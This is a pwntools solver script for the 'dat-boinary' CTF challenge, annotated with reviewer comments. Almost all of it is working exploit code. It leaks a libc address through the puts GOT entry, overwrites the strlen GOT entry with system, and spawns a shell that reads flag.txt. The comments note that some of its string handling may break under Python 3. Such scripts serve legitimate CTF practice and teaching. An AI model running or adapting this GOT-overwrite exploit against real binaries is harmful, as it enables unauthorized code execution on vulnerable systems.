dat-boinary solver
# Flat pwntools solver script for the "dat-boinary" CTF challenge (the
# binary is not in this page, so everything said below about the target's
# menu options is read off the send/recv sequence and hedged accordingly).
#
# NOTE(review): the string/bytes mixing below ("/bin/sh\x00" + cyclic(...),
# "uid=" in r.recvrepeat(2), "Flag: " + r.recv(1024)) reads as Python 2 era
# pwntools; on Python 3 pwntools the tube returns bytes and these
# concatenations/containment checks would raise TypeError -- confirm before
# rerunning.
from pwn import *
from time import sleep

# ELF handles for the challenge binary and its libc.  LIBC defaults to the
# libc shipped alongside the script and can be overridden on the command
# line (LIBC=...), since the offsets used at the end come from this object.
e = ELF('./dat-boinary')
libc = ELF(args.get('LIBC', './libc.so.6'))

# REMOTE=1 targets the contest host; otherwise the binary is run locally.
if args.get('REMOTE'):
    r = remote("problems.ctfx.io", 1337)
else:
    r = process(e.path)

# Absolute address of a small gadget inside the binary.  Hardcoding it (and
# the got.* addresses used below) means the script assumes a fixed load
# address, i.e. a non-PIE binary; the GOT writes further down likewise assume
# the GOT is writable (presumably no full RELRO).  Those two hardening
# options are what would stop this particular solve -- the binary itself is
# not on this page, so this is inferred from the constants, not verified.
strlen_replace = 0x08048567
'''
0x08048567 91 xchg eax, ecx
0x08048568 0408 add al, 8
0x0804856a 01c9 add ecx, ecx
0x0804856c f3c3 ret
'''

# Local runs only: attach gdb with a breakpoint and give it time to settle
# before any input is sent.
if not args.get("REMOTE"):
    gdb.attach(r, "b * 0x0804889d")
    sleep(3)

# NOTE(review): every r.recv(1024) below reads *up to* 1024 bytes of whatever
# has arrived so far, with no delimiter; if the target is slow a prompt can
# be consumed by a later recv instead.  The script relies on the menu being
# served fast enough that each recv drains one prompt.

# max out the id buffer so we can overwrite past it later
r.sendline(cyclic(8))
r.recv(1024)
log.info("buffer maxed out")
# set id buffer+8 to 0x69696969 to clear nulls so we can overwrite meme content addr
r.sendline("5")
r.recv(1024)
log.info("called secret meme")
# set meme content addr to strlen
# (menu option "1" appears to rewrite the id buffer; the 0xc bytes of filler
# followed by a 4-byte pointer suggests the content pointer sits 0xc bytes
# into that buffer -- inferred from the payload layout, not from the binary)
r.sendline("1")
r.sendline(cyclic(0xc) + p32(e.sym['got.strlen']) + cyclic(10))
r.recv(1024)
log.info("meme content should be addr of strlen")
# set dankness back to a reasonable # so that we can write content to the meme
r.sendline("2")
r.sendline("5")
r.recv(1024)
log.info("set dankness to 5")
# overwrite strlen with our gadget that ignores nulls
# (this is a write through the pointer set above, i.e. into the GOT entry)
r.sendline("3")
r.sendline(p32(strlen_replace))
r.recv(1024)
log.info("strlen replaced")
# set meme content addr to puts
r.sendline("1")
r.sendline(cyclic(0xc) + p32(e.sym['got.puts']) + cyclic(10))
r.recv(1024)
log.info("meme is now the address of puts")
# leak the address of puts... I guess I could have just done strlen. Oh well
r.sendline("4")
r.recvuntil("c0nT3nT:")
r.recv(1)  # tab
# The 4 bytes following the tab are read as a little-endian pointer: the
# resolved GOT entry of puts.
leaked_puts = u32(r.recv(4))
# rebase libc on leaked puts addr
# (ASLR is defeated by the leak, not bypassed: libc.address is set so that
# every later libc.symbols[...] lookup yields a runtime address)
libc.address = leaked_puts - libc.symbols["puts"]
r.recv(1024)
log.success("leaked puts: " + hex(leaked_puts) + ", system: " + hex(libc.symbols['system']))
# read in /bin/sh to id and also set the meme content addr to strlen
# ("/bin/sh\x00" is 8 bytes, so cyclic(0xc-8) keeps the pointer at offset 0xc)
r.sendline("1")
r.sendline("/bin/sh\x00" + cyclic(0xc-8) + p32(e.sym['got.strlen']) + cyclic(20))
r.recv(1024)
log.info("set meme to strlen")
# to set content (overwrite strlen with system) set the dankness back to 11 :)
# (the value actually sent is "5", the same as earlier)
r.sendline("2")
r.sendline("5")
r.recv(1024)
log.info("set dankness to 5")
# overwrite strlen with system
r.sendline("3")
r.sendline(p32(libc.symbols['system']))
r.recv(1024)
log.info("set strlen to system")
# call dat bad boiiii
# (option "1" presumably runs strlen on the id buffer, which now starts with
# "/bin/sh" and whose GOT slot now points at system)
r.sendline("1")
r.recvuntil("ur m3m3 id")
# enjoy dat shell boi ;)
# Success is detected by running `id` and looking for "uid=" in up to two
# seconds of output; anything else is reported as a failure.
r.sendline("id")
log.info("trying shell")
if "uid=" in r.recvrepeat(2):
    log.success("got shell")
    r.sendline("cat flag.txt")
    log.success("Flag: " + r.recv(1024))
else:
    log.error("failed to get shell")